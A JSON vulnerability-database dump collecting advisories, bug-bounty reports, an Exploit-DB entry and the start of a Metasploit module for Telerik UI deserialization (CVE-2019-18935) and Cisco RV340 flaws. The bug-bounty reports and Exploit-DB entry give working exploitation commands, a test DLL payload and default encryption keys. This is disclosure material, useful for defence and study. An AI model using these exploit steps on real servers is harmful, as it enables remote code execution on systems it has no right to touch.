"LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-03-21T16:01:00", "type": "cve", "title": "CVE-2019-7418", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7418"], "modified": "2019-03-25T14:20:00", "cpe": ["cpe:/o:samsung:x7400gx_firmware:6.a6.25", "cpe:/a:samsung:syncthru_web_service:-"], "id": "CVE-2019-7418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*", "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:14:03", "description": "Multiple vulnerabilities in the web-based management interface of the Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an attacker to do the following: Execute arbitrary code Cause a denial of service (DoS) condition Execute arbitrary commands For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-04T18:15:00", "type": "cve", "title": "CVE-2021-1609", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1609"], "modified": "2021-08-12T14:12:00", "cpe": [], "id": "CVE-2021-1609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-13T14:53:30", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "type": "cve", "title": "CVE-2019-18935", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2023-03-15T18:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "prion": [{"lastseen": "2023-08-16T00:45:22", "description": "Multiple vulnerabilities in the web-based management interface of the Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an attacker to do the following: Execute arbitrary code Cause a denial of service (DoS) condition Execute arbitrary commands For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-04T18:15:00", "type": "prion", "title": "Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Web Management Vulnerabilities", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1609"], "modified": "2021-08-12T14:12:00", "id": "PRION:CVE-2021-1609", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-1609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-05T10:45:46", "description": "The Cisco Small Business RV340 and Cisco Small Business are both products of Cisco, Inc. The Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN routers have a security vulnerability in their Web-based management interface that allows an unauthenticated remote attacker to execute arbitrary code on the affected device or cause the device to be used as a gateway between networks. remote attacker to execute arbitrary code on the affected device or cause the device to reload, resulting in a denial-of-service (DoS) condition.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-06T00:00:00", "type": "cnvd", "title": "Multiple vulnerabilities exist in Cisco Small Business RV340 and Cisco Small Business", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1609"], "modified": "2021-09-01T00:00:00", "id": "CNVD-2021-59765", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59765", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-09-03T17:58:05", "bounty": 0.0, "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-02T08:13:07", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via CVE-2019-18935", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-08-13T18:11:22", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-03T13:50:55", "bounty": 0.0, "description": "**Description:**\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\n\n## Impact\n\nAn attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nTelerik UI Version \u2588\u2588\u2588\n\n## CVE Numbers\nCVE-2017-11317, CVE-2019-18935\n\n## Steps to Reproduce\n## Verify the Upload Handler is Registered\nFirst, confirm the file upload handler is registered by issuing the following request:\n```bash \ncurl -sk https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau\n```\nYou should see the following response:\n```\n{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }\n```\n\n\n## Version Identification\nNext, you will need to install `RAU_crypto` (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable versions until finding the correct version. After `RAU_crypto` has been installed, you can use the following script (with the attached _versions.txt_ file):\n```bash\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P '\u2588\u2588\u2588\u2588\u2588' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\n\nThis uploads a file (in this case, `testfile.txt`) to the `\u2588\u2588\u2588\u2588\u2588` directory on the target server. The contents of my `testfile.txt` simply included the word \"test\".\n\nThe script should eventually identify a vulnerable version (`\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588`), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file:\n```bash\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588: {\"fileInfo\":{\"FileName\":\"RAU_crypto.bypass\",\"ContentType\":\"text/html\",\"ContentLength\":5,\"DateJson\":\u2588\u2588\u2588\u2588\u2588 }\n```\n\n## Compiling a Test Payload\nNow that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding:\n```c\n#include <windows.h>\n#include <stdio.h>\n\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\n{\n if (fdwReason == DLL_PROCESS_ATTACH)\n Sleep(10000); // Time interval in milliseconds.\n return TRUE;\n}\n```\n\nAs a .NET application will only load an assembly once with a given name, the dll from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused dll for testing purposes if desired (if not, just follow the steps from the link in the references section).\n\n## Exploitation\nNow that we have our test payload ready, we can use the attached _CVE-2019-18935.py_ script to upload and execute the dll.\n\n```bash\npython3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 -f '\u2588\u2588\u2588' -p sleep_2020070207013954_amd64.dll\n```\n\n> *Note: I'm having trouble getting the server to sleep with the crafted `.dll`. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can't get execution.*\n\n## Suggested Mitigation/Remediation Actions\nUpdate TelerikUI to the latest (or a patched) version.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T09:38:03", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-06-03T16:27:14", "id": "H1:1174185", "href": "https://hackerone.com/reports/1174185", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-03T18:10:01", "bounty": 0.0, "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-03T14:48:45", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-05-07T16:54:15", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-08-06T22:59:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-18935", "CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip", "sourceHref": "https://www.exploit-db.com/raw/47793", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-09-21T08:05:46", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/telerik_rau_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI 